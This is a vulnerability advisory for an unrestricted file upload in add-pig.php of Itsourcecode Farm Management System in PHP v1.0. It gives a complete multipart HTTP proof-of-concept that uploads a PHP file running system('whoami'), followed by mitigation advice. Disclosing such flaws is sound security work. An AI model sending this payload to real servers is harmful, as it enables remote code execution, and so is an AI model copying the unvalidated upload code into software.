Itsourcecode Farm Management System In PHP v1.0 add-pig.php Unrestricted Upload
NAME OF AFFECTED PRODUCT(S)
- Farm Management System In PHP
AFFECTED AND/OR FIXED VERSION(S)
submitter
- zzz,xiongbaojiang
Vulnerable File
- add-pig.php
VERSION(S)
- V1.0
PROBLEM TYPE
Vulnerability Type
- Unrestricted Upload
Root Cause
In the add-pig.php file of the “Farm Management System In PHP” project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.
Vulnerability Path
In the add-pig.php file of the “Farm Management System In PHP” project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.
Key Parameter:
-
Parameter:
$res1_name -
File Name:
farm management system/add-pig.php -
Line Number: 37
$res1_name = basename($_FILES['pigphoto']['name']);
File Upload:
-
Trigger Path: Arbitrary File Upload/Write
-
File Name:
farm management system/add-pig.php -
Line Number: 45
$move = move_uploaded_file($tmp_name, $location.$res1_name);
Vulnerability POC
POST /farm123/add-pig.php HTTP/1.1
Host: farm
Content-Type: multipart/form-data; boundary=---------------------------85676068117477891701865867569
Content-Length: 1468
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigno"
pig-fms-2793
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="weight"
1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="arrived"
2024-12-17
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="gender"
male
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="status"
active
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="breed"
23
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="remark"
1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream
GIF89a;
<?php
system('whoami');
?>
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="submit"
-----------------------------85676068117477891701865867569--
Payload:
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream
GIF89a;
<?php
system('whoami');
?>
The following are screenshots of some specific information obtained from testing and running with the yakit tool:
/uploadfolder/test.php
Recommendations for Vulnerability Mitigation
- File Type Validation: Limit the allowed file types (e.g., only allow image formats) before processing uploads.
- File Name Sanitization: Clean and rename uploaded files to avoid using user-provided names directly.
- Use Temporary Directory: Store uploaded files in a temporary directory and conduct security checks after processing.
- Permission Control: Ensure correct permission settings on the upload directory to prevent direct execution of uploaded files.
- Input Validation: Rigorously validate all user inputs to ensure security.
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
